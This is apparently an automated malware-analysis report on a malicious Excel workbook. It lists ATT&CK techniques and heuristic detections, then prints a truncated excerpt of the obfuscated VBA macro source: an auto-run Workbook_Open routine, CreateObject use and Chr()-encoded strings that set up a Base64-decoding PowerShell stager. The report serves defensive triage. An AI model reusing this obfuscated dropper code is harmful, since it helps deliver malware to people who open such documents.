Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is an Excel file containing a Workbook_Open VBA macro, which runs automatically when the workbook is opened. The macro uses the Shell() function to execute a Base64-encoded PowerShell command. The decoded command appears to be a stager, indicating that the file's purpose is to download and execute a second-stage payload. The obfuscated PowerShell command and the macro-based stager are common malware-delivery techniques.
Heuristics (7)

- VBA macros detected (medium, 5 related findings) `OLE_VBA_MACROS`: Document contains VBA macro code.
- Shell() call in VBA (critical) `OLE_VBA_SHELL`: Shell() call in VBA.
- VBA Base64-decoded Shell command stager (critical) `OLE_VBA_BASE64_SHELL_COMMAND_STAGER`: VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
- Workbook_Open macro (high) `OLE_VBA_WBOPEN`: Workbook_Open macro.
- CreateObject call (high) `OLE_VBA_CREATEOBJ`: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) `OLE_VBA_PCODE_AUTOEXEC_EXEC`: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) `EXTRACTED_FILE_STATIC_TRIAGE`: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11466 bytes | f646612ed54efe11ee7d5f11ca9d4b25923e61236c95eb329f4794aba277d49d | ClamAV: no threats found. Obfuscation or payload: likely (carved artifact contains 5 long base64-like blobs). |

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
aOklWA1xBbfmk3Fw.iUrGGAqkZjPWRhaDqH8M
Dim oSx99mJIfQ2aYl98CVXPnM4ym26EcyA45hPNgsHczfDHrx7pi As CheckBox
Dim c_StqiaX8TFpDpqO7f1UsYSM5ZFHuFx4Of_xqIL8xziWBvuyU2 As CheckBox
Dim tQESyCpExPaQl1fKZfp3hwR As CheckBox
Dim f2z6KGnPw3Ufx5 As CheckBox
Dim p6FjT6efLr1yUMHbS68Kw7Kt4pkJdsd9Wdzsu7bUV_oG_UuY As CheckBox
Dim GShXgkGstVpmTTAbL As CheckBox
Dim ZzWYqUclxwPDog5JBJIEavV As CheckBox
Dim E9WOyAB9K4L54ArlL55vTaoqHqHQ As CheckBox
Dim zQEXncQZR_mkvx_Ial_ISg7Je9BmSpFF1tH3wxPZsQSGPS_fVdO As CheckBox
Dim fp97QT53nZmEk7fsBoJUmUi As CheckBox
Dim ZBMy4K9eOxZjY2vzh24l9_JqI As CheckBox
Dim si8zKHkIFh5CeAqn5VQJVE1NxlcrsjT1fnIk As CheckBox
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "aOklWA1xBbfmk3Fw"
Dim mTjzEagIqgqGy2hDNtMRawYUL9I61sUgmwNKjNXC4X2FXM9zFD1Flpgy4MmEPjR8KHcAmVc_TIXB5R68_Syv1N57OYPUkQuSE44Os8Ksj1uaQd3kQnE7tfE7MftMEGWBXD As String
Function AnDnxYRSzwB1L7Dq2ewmrrBio3ZeLCez1_mO(ULlGiE__KiNTmJKnld7BomkLUAhVV5Jz4TyKLwi9vHKthk2FFMboDd1qjYuggrrPXWYRT_Zy48NfZ1mtHaNHaduXbGjvABZDY5UIJhuFvmuEOTOsvAXEcix3l_zLXmw2fJEeebhjoFUxsoHF1z_)
Dim u_GyDDIwkppz9PD3TosERHx2W6cWP As CheckBox
Dim VwEn9iYrGo7w12YHXpUBxmLr_4lOOa As CheckBox
Dim GiueN3iJ9qnIK_vRZOWr8NGTbriWiD7HbpfVAUlfhLpmVmaL5ucU1fb As CheckBox
Dim SjhcUPDmilP5sBp5Vny_aaXHmYF8uTM6FweVkdhnC44C6AQg2pNAU2a2KXz5H_2MXTx6eRS2EJBfg
Dim ZYCfSKk4tepdbYQ_l1Hthd8xOUa As CheckBox
Dim wjjP6Ln5jQEKVkv3166secWr_ As CheckBox
Dim VrS6aMO7txRHMtQxcqvenvHujE1Sl6RL As CheckBox
Dim cOLzbnUAVqqaERqErd_Hse5JPebi5YhkIeLA9nuIWGdpeRB9TLZRn8k7SBh6JuE6HEPjEoFDs4tjAMn8ccMq9N7K4Nq6_x8lBggYAZ2o_UhtL_5EWjbqgW74H_pz8I945GhcpM6BjhkloK8
Dim PhdS9GCzNkwbsmKn5BvjKTihgTUV6TxdEO7KvcchsoYIUR1 As CheckBox
Dim bonp3flp595vnup44wQUco_1ZgL1e As CheckBox
Dim XLNc3pPm48ciAKzqyvBudUC6VvowNURtI_irfI2_lP3R23nw_s As CheckBox
Dim qYytYBHQEE_cWhnrX_lGIn3AGMbtDcG2vem35XighMD As CheckBox
Dim v9H2TnIdmJ1hCewlKiXMl As CheckBox
Dim Gp15uv9Y_i6jFA8TG_38cq47jVFvW7H_aw1a_X3 As CheckBox
Set cOLzbnUAVqqaERqErd_Hse5JPebi5YhkIeLA9nuIWGdpeRB9TLZRn8k7SBh6JuE6HEPjEoFDs4tjAMn8ccMq9N7K4Nq6_x8lBggYAZ2o_UhtL_5EWjbqgW74H_pz8I945GhcpM6BjhkloK8 = CreateObject(mTjzEagIqgqGy2hDNtMRawYUL9I61sUgmwNKjNXC4X2FXM9zFD1Flpgy4MmEPjR8KHcAmVc_TIXB5R68_Syv1N57OYPUkQuSE44Os8Ksj1uaQd3kQnE7tfE7MftMEGWBXD)
Dim VdLEQlaXum1ZSSmcZu4TXnLBFZ5HRIfSrK As CheckBox
Dim fcOklSG8THffyowSZpEDcqQJ8zpQ_kFfrFwILyGjKY As CheckBox
Dim RCejjOU9syMnqyK_lvmz2sB9wq2mEjge1DWMnWNY6_2PQCY78FKU6UgiAev As CheckBox
AWpMAF_J9bcnuenC6Kwhiw7BKL8mbbrCLg2LkYDznTEds29qZDazjeULZmAwGarfsZaLmaaeF = Chr(478 - 380) & Chr(419 - 314) & Chr(141 - 31) & Chr(66 - 20) & Chr(239 - 141) & Chr(427 - 330) & Chr(205 - 90) & Chr(391 - 290) & Chr(361 - 307) & Chr(105 - 53)
Dim Wq2GQrvma7ZMfL3w1tptQ4o8XJheewKGkU As CheckBox
Dim BMKs8iPue_p8ysbtrPyBjbB4sEIPFmuQlIJnjF As CheckBox
Dim vFbfXnPYUyBu_5Ri As CheckBox
Set SjhcUPDmilP5sBp5Vny_aaXHmYF8uTM6FweVkdhnC44C6AQg2pNAU2a2
```
... (truncated)